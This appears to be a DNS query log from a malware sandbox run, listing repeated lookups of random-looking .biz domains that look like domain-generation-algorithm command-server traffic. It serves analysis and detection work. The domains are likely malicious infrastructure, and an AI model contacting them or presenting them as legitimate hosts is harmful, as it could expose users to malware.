                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.405574083 CET192.168.2.81.1.1.10xd392Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.433751106 CET192.168.2.81.1.1.10x942Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.157459021 CET192.168.2.81.1.1.10xe6b4Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.166537046 CET192.168.2.81.1.1.10x5d38Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.181376934 CET192.168.2.81.1.1.10x220Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.040138006 CET192.168.2.81.1.1.10xee6dStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.043476105 CET192.168.2.81.1.1.10xb78eStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.268151045 CET192.168.2.81.1.1.10xc81Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.575942039 CET192.168.2.81.1.1.10x4ab8Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.043612003 CET192.168.2.81.1.1.10x5cb4Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.793040037 CET192.168.2.81.1.1.10x4618Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.520415068 CET192.168.2.81.1.1.10x5e17Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.093365908 CET192.168.2.81.1.1.10x3ff7Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.291162968 CET192.168.2.81.1.1.10x64daStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.994280100 CET192.168.2.81.1.1.10x5938Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.850527048 CET192.168.2.81.1.1.10x3c08Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.325527906 CET192.168.2.81.1.1.10xe0b4Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.048506021 CET192.168.2.81.1.1.10x56b8Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.251434088 CET192.168.2.81.1.1.10xe6d1Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.053553104 CET192.168.2.81.1.1.10x2b6aStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.970058918 CET192.168.2.81.1.1.10x515dStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.980676889 CET192.168.2.81.1.1.10xfac5Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.915971041 CET192.168.2.81.1.1.10x7516Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.717932940 CET192.168.2.81.1.1.10xcfa0Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.870739937 CET192.168.2.81.1.1.10x7a1fStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.931720018 CET192.168.2.81.1.1.10x57ceStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.933089018 CET192.168.2.81.1.1.10xf0d3Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.780493021 CET192.168.2.81.1.1.10x2890Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.539175987 CET192.168.2.81.1.1.10xc696Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.644606113 CET192.168.2.81.1.1.10x985fStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.521153927 CET192.168.2.81.1.1.10x79baStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.066654921 CET192.168.2.81.1.1.10x4fefStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.335480928 CET192.168.2.81.1.1.10xac08Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.510158062 CET192.168.2.81.1.1.10x612Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.166958094 CET192.168.2.81.1.1.10x8e9aStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.261859894 CET192.168.2.81.1.1.10xcb45Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.974544048 CET192.168.2.81.1.1.10x5a0dStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.171642065 CET192.168.2.81.1.1.10x469fStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.876559019 CET192.168.2.81.1.1.10x3b96Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.587219954 CET192.168.2.81.1.1.10xc030Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.596143007 CET192.168.2.81.1.1.10xbc64Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.755439997 CET192.168.2.81.1.1.10xeca1Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.553889990 CET192.168.2.81.1.1.10x70cdStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.942816019 CET192.168.2.81.1.1.10xd3b6Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.520258904 CET192.168.2.81.1.1.10x89c8Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.208398104 CET192.168.2.81.1.1.10x7ed6Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.763222933 CET192.168.2.81.1.1.10xcf36Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.838488102 CET192.168.2.81.1.1.10x7ce2Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.027750015 CET192.168.2.81.1.1.10x9b38Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.312442064 CET192.168.2.81.1.1.10xa0e9Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.179259062 CET192.168.2.81.1.1.10xb50eStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.943233967 CET192.168.2.81.1.1.10x5c18Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.446259975 CET192.168.2.81.1.1.10x342eStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.403558016 CET192.168.2.81.1.1.10xe11fStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.459177971 CET192.168.2.81.1.1.10x3f21Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.353635073 CET192.168.2.81.1.1.10x5872Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.943114996 CET192.168.2.81.1.1.10x5399Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.991374016 CET192.168.2.81.1.1.10x25b1Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.072154999 CET192.168.2.81.1.1.10x53d7Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.692435026 CET192.168.2.81.1.1.10xc6e3Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.916155100 CET192.168.2.81.1.1.10x918dStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.580729008 CET192.168.2.81.1.1.10xac57Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.729126930 CET192.168.2.81.1.1.10x5432Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.589586020 CET192.168.2.81.1.1.10x5473Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.397078037 CET192.168.2.81.1.1.10x8015Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.404727936 CET192.168.2.81.1.1.10xabe4Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.972453117 CET192.168.2.81.1.1.10xa228Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.422909021 CET192.168.2.81.1.1.10xf41dStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.229377985 CET192.168.2.81.1.1.10x56fdStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.469060898 CET192.168.2.81.1.1.10xa987Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.540858030 CET192.168.2.81.1.1.10xeb97Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.179589033 CET192.168.2.81.1.1.10x1bd0Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.600838900 CET192.168.2.81.1.1.10x3d0Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.777584076 CET192.168.2.81.1.1.10xf9d7Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.325391054 CET192.168.2.81.1.1.10xae09Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.338583946 CET192.168.2.81.1.1.10xae7fStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.041321039 CET192.168.2.81.1.1.10xd106Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.822761059 CET192.168.2.81.1.1.10x44Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.840404034 CET192.168.2.81.1.1.10x522cStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.303960085 CET192.168.2.81.1.1.10xc473Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.973665953 CET192.168.2.81.1.1.10xb6ceStandard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.974128008 CET192.168.2.81.1.1.10x6e08Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.008445024 CET192.168.2.81.1.1.10x4142Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.472347975 CET192.168.2.81.1.1.10x9221Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.900262117 CET192.168.2.81.1.1.10x6238Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.214235067 CET192.168.2.81.1.1.10x7e68Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.070918083 CET192.168.2.81.1.1.10x22e4Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.106878042 CET192.168.2.81.1.1.10xc5eeStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.852778912 CET192.168.2.81.1.1.10x2b7fStandard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.280549049 CET192.168.2.81.1.1.10x7f8Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.832566977 CET192.168.2.81.1.1.10x53e2Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.329751015 CET192.168.2.81.1.1.10xc4b7Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.880384922 CET192.168.2.81.1.1.10x6e7Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.020618916 CET192.168.2.81.1.1.10x9d24Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.369285107 CET192.168.2.81.1.1.10x4425Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.327465057 CET192.168.2.81.1.1.10x4158Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.394644976 CET192.168.2.81.1.1.10x84a2Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.923381090 CET192.168.2.81.1.1.10xec15Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.002506971 CET192.168.2.81.1.1.10x9bcbStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.703593969 CET192.168.2.81.1.1.10x86a1Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.942580938 CET192.168.2.81.1.1.10x6f5eStandard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.954154015 CET192.168.2.81.1.1.10xfebeStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.176022053 CET192.168.2.81.1.1.10xff72Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.559618950 CET192.168.2.81.1.1.10x1718Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.811927080 CET192.168.2.81.1.1.10x47bfStandard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.927412987 CET192.168.2.81.1.1.10x2451Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.970680952 CET192.168.2.81.1.1.10xbaffStandard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.654959917 CET192.168.2.81.1.1.10x921aStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.347172976 CET192.168.2.81.1.1.10x2cd0Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.512101889 CET192.168.2.81.1.1.10xae3fStandard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.200558901 CET192.168.2.81.1.1.10x94ccStandard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.009069920 CET192.168.2.81.1.1.10x5e1Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.183192968 CET192.168.2.81.1.1.10xa888Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.906220913 CET192.168.2.81.1.1.10x4cddStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.032150984 CET192.168.2.81.1.1.10x5020Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.890295982 CET192.168.2.81.1.1.10x4acdStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.924076080 CET192.168.2.81.1.1.10x73b5Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.740824938 CET192.168.2.81.1.1.10x2886Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.845432043 CET192.168.2.81.1.1.10x2246Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.457041979 CET192.168.2.81.1.1.10xd588Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.968569040 CET192.168.2.81.1.1.10x6fbbStandard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.142920971 CET192.168.2.81.1.1.10x672cStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.151076078 CET192.168.2.81.1.1.10x77d1Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.435276031 CET192.168.2.81.1.1.10x265aStandard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.731465101 CET192.168.2.81.1.1.10x7c37Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.421771049 CET192.168.2.81.1.1.10x86a5Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.186521053 CET192.168.2.81.1.1.10xd26cStandard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.891637087 CET192.168.2.81.1.1.10xcbe2Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.581923008 CET192.168.2.81.1.1.10x29deStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.826814890 CET192.168.2.81.1.1.10x14acStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.168979883 CET192.168.2.81.1.1.10x1cd0Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.115350962 CET192.168.2.81.1.1.10xa0b3Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.271426916 CET192.168.2.81.1.1.10x6d4bStandard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.819504023 CET192.168.2.81.1.1.10x8688Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.361644030 CET192.168.2.81.1.1.10x4803Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.694372892 CET192.168.2.81.1.1.10x9178Standard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.819971085 CET192.168.2.81.1.1.10x2d67Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.967329979 CET192.168.2.81.1.1.10x88f4Standard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.952862024 CET192.168.2.81.1.1.10xba89Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.085788012 CET192.168.2.81.1.1.10xbc92Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.795110941 CET192.168.2.81.1.1.10xb148Standard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:13.592905045 CET192.168.2.81.1.1.10x5879Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.304894924 CET192.168.2.81.1.1.10xa221Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.126168966 CET192.168.2.81.1.1.10x8896Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.765778065 CET192.168.2.81.1.1.10xcf91Standard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.449249029 CET192.168.2.81.1.1.10x4b13Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.556993961 CET192.168.2.81.1.1.10xbcecStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.336863995 CET192.168.2.81.1.1.10x8752Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.733479023 CET192.168.2.81.1.1.10xfeadStandard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.104712009 CET192.168.2.81.1.1.10xe4faStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.364041090 CET192.168.2.81.1.1.10xf79bStandard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.683653116 CET192.168.2.81.1.1.10x2d53Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.387754917 CET192.168.2.81.1.1.10x5c34Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.419096947 CET192.168.2.81.1.1.10xd7d6Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.468694925 CET192.168.2.81.1.1.10x490fStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
